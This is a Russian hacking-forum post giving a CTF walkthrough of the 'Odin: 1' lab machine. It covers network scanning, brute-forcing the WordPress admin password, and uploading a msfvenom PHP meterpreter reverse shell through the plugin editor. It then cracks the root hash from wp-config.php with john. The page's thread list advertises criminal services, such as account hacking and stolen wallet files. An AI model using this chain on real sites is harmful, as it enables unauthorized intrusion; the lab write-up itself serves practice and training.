Солевой генний или как пройти CTF Odin: 1

AngelXXXanax

Original poster
Member
Сообщения
5
Реакции
8
Посетить сайт
И так... Посидел, поймал солевой трип и стал солевым гением. Так что сегодня вы будете читать статью о прохождении CTF Odin:1.



Незабываем добавить его в /etc/hosts



Так как он ставиться на VM, VB нам прийдется проскинть нашу сеть, чтобы найти IP. Для этого мы будем использовать утилиту под название arp-scan. Для этого мы пишем:



sudo arp-scan -l


IP машину у меня 192.168.1.6

Давайте теперь просканим открытые порты и посмотрим что там у нас такое интересное. Для этого мы будем использовать утилиту nmap > Ключ: sudo nmap -sS -Pn -n -p- -vvv -T4 192.168.1.6






Как мы можем видеть у нас есть открытый порт 80. Это значит что мы можем перейти по этому IP и попасть на сайт. Если это сделать - то мы увидим это:


Верно! Это говно какое-то) Если немного полазить по сайту мы можем понять что он на движке wordpress. Так что давайте зайдем на точку входа в админ панель.


Окей. На данный момент у нас все весьма хорошо! Так что давайте попробуем сбрутить админ пароль с помощью wpscan.



Для этого мы напишем:

wpscan --url

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--usernames admin --passwords путь на ваш словарь для брута

Теперь нам осталось недолго подождать когда подберет нужный нам пароль. И как мы видим он смог подобрать нужный нам пароль:




Пробуем зайти в админ-панель:


Как мы видим у нас все получилось! Но нам нужно как-то попасть на сервер и получить флаг... Так что можно попробовать загрузить шелл на сайт! Для этого жмем plugins > plugin editor:


Теперь давайте будем использовать msfvenom, чтобы создать наш шелл. Для этого пишем:

msfvenom -p php/meterpreter/reverse_tcp lhost=ваш IP lport=4444 R


Теперь копируем и кидаем в плагины:


Теперь запускаем наш msfconsole и пишем:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost ваш IP
set lport 4444
exploit



Теперь загружаем шелл и переходим по пути:


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




P.S это в моем случае так как я выбрал другой плагин)



И как мы можем видеть мы получили meterpreter сессию. Теперь пишем shell, после чего пишем

python3 -c "import pty;pty.spawn('/bin/bash')"




Как мы можем видеть у нас появился нормальный рабочий шелл. Давайте теперь немного полазим по файлам. Как мы видим я перешел на этот путь и нашел файл wp-config.php


Давайте теперь напишем: cat wp-config.php

После чего мы сразу увидим такой странный ключ:


Он и есть нашим паролем для входа в рут! Но нам ещё нужно взломать его. Для этого просто копируем его и сохраняем "В моем случае файл называться crack.txt". Теперь пишем:

john --wordlist=/usr/share/john/password.lst путь к файлу/crack.txt


Как мы видим пароль нашелся! "jasmine". Теперь давайте попробуем зайти. Просто пишем: su root:




Теперь переходим в директорию root. Пишем cat bjorn:


Вот и все! Мы прошли машину.
 
  • Like
Реакции: Admin и 9779
Название темы
Автор Заголовок Раздел Ответы Дата
9779 Интересно XSS, или как получить халявные cookie Ч1. Уязвимости и взлом 8
berdnik3 Поезд или самолет? Свободное общение и флейм 7
I Emacs VM или termux для программирования Свободное общение и флейм 0
9779 Интересно MST-или деанон через ссылку. Полезные статьи 5
abc11 Куплю Куплю dating отклик и базы email adult или dating направленности Куплю/Обменяю 1
S Дурак или Умный. Кому жить проще? Свободное общение и флейм 4
V Андрей Комбат «Начало пути или заработай в сети» 2.0 Способы заработка 2
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах Куплю/Обменяю 1
Ricardo Milos Продам Пластиковые карты Qiwi | ЮMoney, отправка СДЭК или фото пластика Финансы - биллинги, банки, кошельки, логи 0
H SMM за 100.000 или как получить пассивный доход (2021) Способы заработка 0
Р Интересно 1000 рублей на Delivery Club HONOR 10X Lite или HUAWEI P smart Способы заработка 0
B Купить или продать биткоин за рубли без регистрации Berukriptu.ru Обменники 0
st.ap Подскажите курсы или уроки по вирусописанию Вопросы и интересы 2
Ghozt ToxMod или история о том как за катку никто не трогал твою мать. Новости в сети 14
U 500 рублей за 15 минут нужны права или загран Предоставляю работу. Ищу специалиста. 0
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах (доступы к корп сетям). Куплю/Обменяю 0
M Куплю или отработаю БА DE Куплю/Обменяю 3
CMDfromBAT Интересно КАВЕР НА ГОРОД ПОД ПОДОШВОЙ или КОНКУРС НА ЛУЧШИЙ РЭП ПРО ИБ Свободное общение и флейм 6
CMDfromBAT Интересно НЕВИДИМЫЙ IP-LOGGER В СТАТЬЕ TELEGRAPH или ДЕАНОН LVL. 120 Уязвимости и взлом 16
T Поиск сценариев или вредоносного ПО для кражи биткойнов Продажа софта 2
Eteriass Интересно Боксерская груша хакеров или что такое metasploitable Полезные статьи 1
Anorali Интересно Как поймать хацкера за попу или написание своего honeypot'а Полезные статьи 3
3 Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на почту Корзина 0
X Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на поч Ищу работу. Предлагаю свои услуги. 1
Jony14 Интересно Взлом компьютера через беспроводную мышь или клавиатуру Уязвимости и взлом 2
K Нужен дроп или дроповод в Грузии Предоставляю работу. Ищу специалиста. 0
Terezamain Скопирую любой лохотрон или лендинг бесплатно или за символическую плату Другое 0
_ZerO_ Интересно Python и LongPoll VK, или как запустить скрипт ВК и настроит Другие ЯП 2
Sherlock_Holmes Не работает интернет без vpn или tor Вопросы и интересы 3
G Заплачу 70 долларов за два вбива(вбив по палке или по ццшке) Предоставляю работу. Ищу специалиста. 1
J Интересно Глушим сеть wi-fi в termux или kali WiFi/Wardriving/Bluejacking 4
D Интересно Ищу проект или софт Свободное общение и флейм 1
K Нужен дроповод или дроп в Грузии Свободное общение и флейм 0
K Нужны грузинские базы,выводим с казино,возможно уже акки этих казино,или под заточку Свободное общение и флейм 0
V Нужно узнать секреты или поймать на лжи? Корзина 0
2 Всё об уязвимостях GSM сетей или как вас прослушивают. Часть 1 Уязвимости и взлом 6
G Софт для брута /Brite Force или Malware Рубрики Бруты/Парсеры/Чекеры 0
ataman Телеграм бот для поиска имени по номеру или номера по ФИО Украина Пробив информации/Прозвоны 2
SSHMAN Самый страшный поисковик в интернете, “черный Google” или как найти уязвимые веб-камеры по всему миру используя Shodan Уязвимости и взлом 0
G Как взять микрозайм на Яндекс.Деньги или другой способ без ввода CVC? Вопросы и интересы 2
1 Просто ради интереса как много людей здесь слушает Black metal или DSBM? Видео/Музыка 3
lizun1 Duedex бонус или как получить 10$ Способы заработка 0
W Ищу работу или подработку Ищу работу. Предлагаю свои услуги. 0
Forumacc Стоит ли покупать tooligram, или как меня кинули на 18 000р Свободное общение и флейм 5
B Куплю Куплю аккаунт на форуме mfclub или (отзывы) Куплю/Обменяю 1
W Свой шоп или работа с яндекс дзен Полезные статьи 0
W Продам или обменяю файлы wallet.dat с балансами и инфой о пароле Все что не подошло по разделу 3
anspiker Арбитраж трафика с 0 или целевые посетители по 70 копеек Программирование 0
voronkha Нужно узнать секреты или поймать на лжи? Ищу работу. Предлагаю свои услуги. 0
ruslord1 Пробью пароли по логину или почте Другое 1

Название темы